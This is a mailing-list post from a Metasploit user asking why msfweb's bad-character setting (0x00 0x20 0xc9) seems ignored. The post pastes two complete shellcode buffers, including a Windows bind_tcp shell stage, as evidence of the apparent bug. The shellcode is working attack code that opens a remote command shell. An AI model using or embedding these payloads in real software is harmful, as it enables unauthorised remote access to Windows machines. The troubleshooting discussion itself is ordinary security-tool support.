Msfweb: Payload doesn't recognize badchars?

[spinbad.security at googlemail.com (spin bad)]

Hi list

I try to create a payload via the msfweb interface. I use the following
value for the restricted
characters field:

0x00 0x20 0xc9


However, the following payload was generated (notice the second hex value):

unsigned char buf[] =
"\x33\xc9\x83\xe9\xb3\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x13\x8c\xc9\x29\x83\xee\xfc\xe2\xf4\xef\x64\x9f\x29\x13\x8c"
"\x9a\x7c\x45\xdb\x42\x45\x37\x94\x42\x6c\x2f\x07\x9d\x2c\x6b"
"\x8d\x23\xa2\x59\x94\x42\x73\x33\x8d\x22\xca\x21\xc5\x42\x1d"
"\x98\x8d\x27\x18\xec\x70\xf8\xe9\xbf\xb4\x29\x5d\x14\x4d\x06"
"\x24\x12\x4b\x22\xdb\x28\xf0\xed\x3d\x66\x6d\x42\x73\x37\x8d"
"\x22\x4f\x98\x80\x82\xa2\x49\x90\xc8\xc2\x98\x88\x42\x28\xfb"
"\x67\xcb\x18\xd3\xd3\x97\x74\x48\x4e\xc1\x29\x4d\xe6\xf9\x70"
"\x77\x07\xd0\xa2\x48\x80\x42\x72\x0f\x07\xd2\xa2\x48\x84\x9a"
"\x41\x9d\xc2\xc7\xc5\xec\x5a\x40\xee\x40\xe4\x9d\xe3\xbc\x1d"
"\x36\xff\x92\x60\xc9\x28\x13\x8c\x99\x7e\x45\xdf\x40\xcc\xfb"
"\xab\xc9\x29\x13\x1c\xc8\x29\x13\x3a\xd0\x31\xf4\x6b\xb0\xef"
"\x6a\x69\x80\xaf\x5a\x28\xd3\x59\xd4\x28\x64\x07\xfa\x55\xc0"
"\xdc\xbe\x47\x24\xd5\x28\xfb\xba\x1b\x4c\xbf\xfb\x29\x48\x01"
"\x82\x09\x42\x73\x1e\xa0\xcc\x05\x0a\xa4\x66\x98\xa3\x2e\x4a"
"\xdd\x9a\xd6\x27\x03\x36\x7c\x17\xd5\x40\x2d\x9d\x6e\x3b\x02"
"\x34\xd8\x36\x1e\xec\xd9\xf9\x18\xd3\xdc\x99\x79\x43\xcc\x99"
"\x69\x43\x73\x9c\x05\x9a\x4b\xf8\xf2\x40\xdf\xa1\x2b\x13\x9d"
"\x95\xa0\xf3\xe6\xd9\x79\x44\x73\x9c\x0d\x40\xdb\x36\x7c\x3b"
"\xdf\x9d\x7e\xec\xd9\xe9\x7a\x44\x05\x0e\xd6\x46\x90\xa3\x69"
"\x4d\xda\x08\xcf\x15\xda\x08\xcf\x1b\xda\xa3\x29\xec\xd9\xc5"
"\xa0\xd0\xe6\xc9\x41\x13\x9c\xc9\x29\x40\xdb\x36\x7c\x0b\x73"
"\x1a\x29";

/*
 * windows/shell/bind_tcp - 474 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] =
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00"
"\x00\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01"
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b"
"\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2"
"\xeb\xf4\x3b\x54\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b"
"\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc2\x08\x00\x6a\x30\x59\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c"
"\xad\x8b\x58\x08\x5e\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x97\x53"
"\x56\x57\x8d\x44\x24\x10\x50\xff\xd7\x50\x50\x50\x68\xb6\x19"
"\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70\xe9\xff\xd6\x95\x68\x08"
"\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec\x10\x89\xe5\x89\xee"
"\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51\x56\xad\x56\x53"
"\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0\x89\xe0\x6a"
"\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68\x43\x4d"
"\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab\x83"
"\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc"
"\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72"
"\xfe\xb3\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4"
"\x89\xe7\x6a\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0"
"\x31\xc0\x50\x57\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07"
"\xb4\xff\x55\x20\xff\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74"
"\x36\xe8\x77\x00\x00\x00\x50\x89\xe1\x50\x51\x56\x57\xff\x75"
"\x0c\x53\x68\x16\x65\xfa\x10\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x50\x31\xc0\x59\x39\xc8\x74\x11\x50\x51\x57\xff\x75\x28\xff"
"\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb\xab\x89\xe0\xe8\x3f\x00"
"\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28\xff\x55\x14\x31\xc9"
"\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52\x50\x57\xff\x75"
"\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x05\x31\xc0\x59\xeb\xc8\x53\x68\xf0\x8a\x04\x5f\xff\x55\x20"
"\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28"
"\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3";

Is this a bug or did I just something wrong?

Regards

spinbad
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081117/56cd9444/attachment.htm>